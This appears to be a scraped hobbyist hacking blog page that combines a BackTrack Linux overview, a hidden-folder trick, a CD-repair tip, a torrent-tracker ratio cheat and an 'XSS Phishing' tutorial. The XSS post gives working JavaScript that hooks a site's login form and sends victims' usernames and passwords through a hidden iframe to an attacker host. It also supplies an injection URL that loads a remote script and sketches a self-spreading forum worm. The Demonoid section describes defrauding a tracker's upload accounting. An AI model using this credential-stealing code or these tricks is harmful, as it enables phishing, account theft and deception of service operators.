A little more about Backtrack

Backtrack is a Linux distribution distributed as a Live CD which resulted from the merger of WHAX (previously Whoppix) and the Auditor Security Collection, which is used for penetration testing. It allows the user to include customizable scripts, additional tools and configurable kernels in personalized distributions. The Backtrack project was created by Mati Aharoni and Max Moser and is a collaborative effort involving the community.

  • Backtrack 2 was released on March 6, 2007 and includes over 300 security tools. A beta version of Backtrack 3 was released on December 14, 2007, but it was announced that its main focus was to support more and newer hardware as well as provide more flexibility and modularity.
  • Backtrack 3 was released on June 19, 2008. New additions include SAINT and Malt ego. Nessus was not included in this release, and the developers decided not to upgrade from kernel version 2.6.21.5.
  • Backtrack 4 Beta was released on February 11, 2009, with the biggest change being the move to Debian.
  • Backtrack 4 pre-release was released on 19 June 2009.

The key additions to the Backtrack suite are notably -

  • Metasploit integration
  • RFMON Injection capable wireless drivers
  • Kismet
  • AutoScan-Network - AutoScan-Network is a network discovering and managing application
  • Nmap
  • Ettercap
  • Wireshark (formerly known as Ethereal)

Backtracks functionality further increases with the arrangement of each tool in 16 categories. The tool categories are as follows -

    • Enumeration
    • Exploit Archives
    • Scanners
    • Password Attacks
    • Fuzzers
    • Spoofing
    • Sniffers
    • Tunneling
    • Wireless Tools
    • Bluetooth
    • Cisco Tools
    • Database Tools
    • Forensic Tools
    • Reversing
    • Misc

Impress Your Friends With Invisible Folders !!

Posted on 21:38 by Unknown
There have been many questions on how we actually hide a folder in windows Xp box.hack friends
well its not that tuff if you have brain with some computer :)
This technique is my old school way i have used many  times in need !
Look there is no point in creating hidden folders
because you can just go to -

Tools > View >
Show hidden files and folders
But there are many other ways by which you can easily trick your friend or even foe !
just follow these really simple steps and make your friend go ZOOM !!!

Follow these steps:

1. Right click in a directory and go to New Folder.

2. Right click and then go to rename.

3. Delete the name and press Alt + 255. This will make the text disappear.
   NOTE : Please use the Numpad of you computer for pressing Alt + 255 or else it will not work !!

efefewwef

4. Right click on the folder once again but this time go to properties. Click on the "Customize" tab and go to the bottom where it says "Change Icon".

5. Scroll over and choose a blank icon like in this picture  :

hack friend

One Minor flaw is that when you highlight the area with the folder, a small rectangle shows, indicating something is there. Also if you change the view to "Details" it will show it in Description.

This is great for hiding folders because if the even if the person highlights the area, they would have to know it was there.

------------*-------------------------*-------------------------*----------------------*----------------

Hope You all get it !!
if any problem comes please don't forget to comment below . So we can go rocking !!

Please don't forget to subscribe to get these hacks straight in your inbox !!

Xss Phishing

Posted on 11:40 by Unknown
Hi there,
func_resizer.php
There have constant reporting for phishing so tried to get a cool hack for you guys,
as these hacks are becoming more and more famous day by day,
the vulnerabilities are growing and so the hackers activates,
but we first start with XSS.

XSS are certainly changing the away that Phishing attacks are perpetrated.

for example we have a target as :-
http://Thewebsite.com/google/add.php?request=

Suppose, there is a login form and a XSS vulnerability in the
same page.
In order to perpetrate the phishing attack one need to inject JavaScript code in the
variable to make that the victim’s browser load a JavaScript file.
From a brief analyses at the HTML that the site generates I know that :
• The value that the variable “request” receives is not sanitized at all.

• The login form is named “login_clientes”

• The login form have two input fields for user data: “user” and “pass”.
So I will use the following JavaScript code:

loginForm = document.forms['login_clientes'];
function parseData()
{
var username = loginForm.user.value;
var password = loginForm.pass.value;
saveData(username,password);
return true;
}
function saveData(username,password)
{
var frame=document.createElement('iframe');
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" +
password;
frame.style.display='none';
document.body.appendChild(frame);
}
loginForm.onsubmit = parseData;

Idea !

So, if browsing a page like (don’t forget to encode the part of the injection):
http://Thewebsite.com/google/add.php?request=<script type="text/javascript" language="JavaScript"
src="http://yourhost/yourJavaScriptfile.js"></script>
A victim will give you his personal data, as long as he clicks the Submit button.
The ideas that you must have in mind are:

• If you can make the user browser load your JavaScript file or code when visiting
some site, you can change that site behavior.

• If some site has forms and XSS vulnerabilities you can try to get the user
inputted data.

• If the user trust the site, the user will, probably, give his personal data
anywhere in that site.

And if the site has vulnerabilities in some page where it doesn’t have forms, and have
some form(s) in other page(s)?

Conclusion

Try coding some JavaScript that opens, in a full-sized frame, the page that has the login
form. If you can reach the form inside that frame via JavaScript, the job is done, else
store a copy of the html that the login page outputs and, instead of load in a frame the
real login page, load your copy, which you control. As the address bar won’t change,
the user trust on the site won’t, probably, change too.
What more can you do with XSS vulnerabilities?

• In forums, or other type of community sites you can “spread the word”:
If you can send a private message, and you know that the browser of the user
that reads it will parse your JavaScript, you can make a specially crafted
message that, when read, shows, to the victim, the page with the login form,
and, without the victim knows, send to other folk a copy of itself. Your personal
worm.

• As above but, instead of send a private message, you can try to change the user
profile data and fill it with more injections.

• “Misplaced” JavaScript code is more likely to be parsed by Internet Explorer
that by Mozilla Firefox. Both Internet Explorer versions 6.x and 7.x parse
JavaScript code written in a “.txt” file, what can be useful in a real world
situation like making a post in some forum that let you attach “.txt” files, a
more likely situation than one where you can attach an “.html” file. Internet
Explorer version 6.x parse JavaScript code given as the “src” of some image.
Example: <img src=”javascript:your_code”>

How To Fix A Scratched Cd?

Don't throw out that scratched disc yet
Try fixing it with a small dab of CAR WAX!!!!
That's right and here's how to do it :

1. Spread a cloth on a flat surface and place the CD on it.
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longer see the scratch,, wash the disc with water and let it dry before playing.

How to Hack on Demonoid.com

If you are a member of Demonoid you have to keep your share ratio above 1 or you could get banned.
Here is a little trick to cheat ratio.

1. Start downloading.
2. wait until about 75% of the file is downloaded.
3. then pull out phone line from the modem (don't pause the torrent, don't close the torrent client, don't close your internet connection)
4. your internet connection will terminate once you pull the cable.
5. wait until the torrent client display a 'tracker error'. then close the client.
6. re-connect the cable and re-connect to the internet.
7. open the torrent client and download the remaining 25%
the ratio will only be calculated for the last 25% (e.g. - if you are downloading a 1000MB file it would appear that you only downloaded 250MB)

this trick worked for me. I hope it works for you. just be careful when you pull the cable.
